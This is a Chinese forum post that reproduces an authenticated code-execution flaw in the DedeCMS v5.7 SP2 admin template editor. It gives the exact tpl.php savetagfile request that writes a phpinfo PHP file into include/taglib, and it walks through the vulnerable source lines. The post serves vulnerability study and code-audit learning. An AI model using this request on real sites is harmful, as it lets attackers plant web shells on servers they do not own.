罗田县升平网络工作室,一家专业从事网站建设的工作室

资讯论坛

 找回密码
 加入论坛

快捷登录

回帖中禁止出现的内容,违者将被直接永久禁止访问,删除ID处理 :1.违反法律法规 ,包括但不限于出现带有政治、色情、暴恐信息等内容;2.恶意攻击内容,包括但不限于:恶意攻击党和政府、辱骂跟帖者、攻击主题发布者、不服从论坛管理、挑衅管理者、挑战版规等;3.广告、推广内容,尤其出现带有病毒、恶意代码、广告链接等内容,包括但不限于:QQ号、文字QQ号、微信号、手机号、文字手机号、第三方网址、单位公司名称、网站名称等;4.回帖贴出该主题隐藏资源链接或其它主题隐藏资源链接的行为。
查看: 1102|回复: 4

dedecms v5.7 后台sp2代码执行漏洞复现

[复制链接]
发表于 2020-1-2 11:43:28 | 显示全部楼层 |阅读模式
本帖最后由 升平网络工作室 于 2020-1-2 11:44 编辑

dedecms v5.7 sp2代码执行漏洞复现
织梦网站请注意以下漏洞,后台友情链接漏洞!!!!织梦网站请注意以下漏洞,后台友情链接漏洞!!!!
织梦网站请注意以下漏洞,后台友情链接漏洞!!!!
织梦网站请注意以下漏洞,后台友情链接漏洞!!!!





终于复现成功一个漏洞了~~ 不过是后台的一个漏洞
– 源码地址:http://updatenew.dedecms.com/base-v57/package/DedeCMS-V5.7-UTF8-SP2.tar.gz
要有后台管理员账号密码,登录后台。
5dddee524c359.png
访问/dede/tpl.php?action=upload,审查源码,获取我们的token值。
5dddee52e94d4.png
然后访问:
1
http://127.0.0.1/dedev5.7/dede/tpl.php?filename=test.lib.php&action=savetagfile&content=%3C?php%20phpinfo();?%3E&token=abb438be63426baeee2db81a27dfd910

后面加上我们上一步获取的token值。
5dddee5489089.png
然后访问我们的
1
http://127.0.0.1/dedev5.7/include/taglib/test.lib.php

5dddee55294b0.png
发现我们的代码写进去了。
访问include/taglib/test.lib.php
5dddee56025dd.png
漏洞复现
想一想我们的思路:
1、获取token值
2、访问指定的链接
就把我们的代码写入到/include/taglib/xxx.lib.php中
token值很容易获取,那么问题就是在那个链接上面:
1
http://127.0.0.1/dedev5.7/dede/tpl.php?filename=test.lib.php&action=savetagfile&content=%3C?php%20phpinfo();?%3E&token=abb438be63426baeee2db81a27dfd910

看一下参数,就知道这是一个文档保存的操作。
问题出现在tpl.php
这个文档代码也没有多少。
5dddee56a1440.png
很快就能定位到问题代码。不过我这里可能是编码的原因有点乱码,但是这问题不大,我们把逻辑结构看懂就行了。
首先会匹配正则, 要以.lib.php结尾。
然后会将 $content 写入到 $filename 中。
那么我们要跟踪一下文档对这两个参数进行的处理。
然后我们回过头来看整个文档的代码。
1
2
3
4
5
$filename = preg_replace("#[/\\]#", '', $filename);        //line21


$tagname = preg_replace("#.lib.php$#i", "", $filename);        //line260
$content = stripslashes($content);        //line261

可以看出,只有替换,并没有对参数进行安全防护措施。
思考
又是一个安全防护不到位的一个漏洞,为什么就没挖到呢。
于是用seay源代码审计扫了一下。没有扫出这个漏洞点。
5dddee5750432.png
发现这个点是后台的一个功能点。
5dddee58f030d.png
代码审计还是需要多方面考虑,以前一直在看代码,没有从功能点上去考虑,可以转换一下代码审计的思路,尝试去通过功能点,去思考可能会存在什么漏洞,然后去看源码。
对于后台,通常不管是渗透测试、还是代码审计,目标都是拿shell,那么我们就要多多考虑对文档进行的操作了。


打赏鼓励一下!
回复

使用道具 举报

694

主题

735

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
19765
发表于 2020-2-29 17:39:08 | 显示全部楼层
提示: 该帖被管理员或版主屏蔽
回复

使用道具 举报

694

主题

735

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
19765
发表于 2020-2-29 17:58:00 | 显示全部楼层
提示: 该帖被管理员或版主屏蔽
回复

使用道具 举报

694

主题

735

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
19765
发表于 2020-2-29 17:59:34 | 显示全部楼层
提示: 该帖被管理员或版主屏蔽
回复

使用道具 举报

694

主题

735

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
19765
发表于 2020-2-29 18:00:04 | 显示全部楼层
提示: 该帖被管理员或版主屏蔽
回复

使用道具 举报

回帖中禁止出现的内容,违者将被直接永久禁止访问,删除ID处理 :1.违反法律法规 ,包括但不限于出现带有政治、色情、暴恐信息等内容;2.恶意攻击内容,包括但不限于:恶意攻击党和政府、辱骂跟帖者、攻击主题发布者、不服从论坛管理、挑衅管理者、挑战版规等;3.广告、推广内容,尤其出现带有病毒、恶意代码、广告链接等内容,包括但不限于:QQ号、文字QQ号、微信号、手机号、文字手机号、第三方网址、单位公司名称、网站名称等;4.回帖贴出该主题隐藏资源链接或其它主题隐藏资源链接的行为。

浏览排行

(38463)2019-11-5 公共云钱包资金盘骗局揭秘: 网络传销+原始股骗局合体!

(22233)2019-12-20 12月17日 邓智天法院直播庭审疑问全解答!

(20722)2019-12-1 环保币GEC资金盘骗局最新消息: 即将崩盘!

(17244)2019-11-9 巨胸肥臀大长腿,嫩模糯美子真人COS不知火舞福利污图

(15868)2018-12-24 罗田县人民法院公布【第五批失信被执行人名单】 ...

(14972)2019-11-3 曝光!PTFX已经崩盘跑路,投资者血流成河!

(13018)2019-8-7 湖北电力网上缴费,支付宝绑定户号的初始密码是什么?

(12480)2018-10-17 罗田县人民政府“12345”市民服务热线服务指南

(11170)2019-12-11 公安定性了, 趣码是非法传销! 趣码怎么退回365元?

(11081)2019-12-15 满足你对女同事的幻想 风骚秘书阿朱销魂眼神勾魂摄魄

最新发表

[升平网络工作室]2025-8-23 [2025-08-23]罗田天气预报

[升平网络工作室]2025-8-23 西藏自治区成立60周年庆祝大会隆重举行 习近平出席大会

[升平网络工作室]2025-8-23 县委委员会召开查摆问题整改整治情况汇报会

[爱查小程序]2025-8-22 [爱查]在线听音乐操作说明

[升平网络工作室]2025-8-22 [2025-08-22]罗田天气预报

[升平网络工作室]2025-8-22 习近平率中央代表团抵达拉萨出席西藏自治区成立60周年庆祝活动

[升平网络工作室]2025-8-22 县关工委联合经济开发区开展“情系学子”助学活动 助力职工子女圆梦大学

[升平网络工作室]2025-8-21 2025年罗田县卫健系统赴高校公开招聘事业单位工作人员拟聘用人员公示公告

[升平网络工作室]2025-8-21 [2025-08-21]罗田天气预报

[升平网络工作室]2025-8-21 县安防委2025年度第三次全体(扩大)会召开

QQ|Archiver|手机版|小黑屋|资讯论坛BBS.SPW8.CN ( 鄂ICP备2021011341号-3 )|网站地图


手机扫一扫继续访问
[免责声明]
本站系本网编辑转载,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。
如涉及作品内容、版权和其它问题,请在30日内与本网联系,我们将在第一时间删除内容!
[声明]本站文章版权归原作者所有 内容为作者个人观点 本站只提供参考并不构成任何投资及应用建议。

进入社区 | 发表新帖 | 百度收录 |
技术提供:罗田县升平网络工作室
站长Email:admin@spw8.cn
投诉电话(刮开查看):15374567400

GMT+8, 2025-8-23 20:21 , Processed in 0.748955 second(s), 33 queries .

Powered by Discuz! X3.4

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表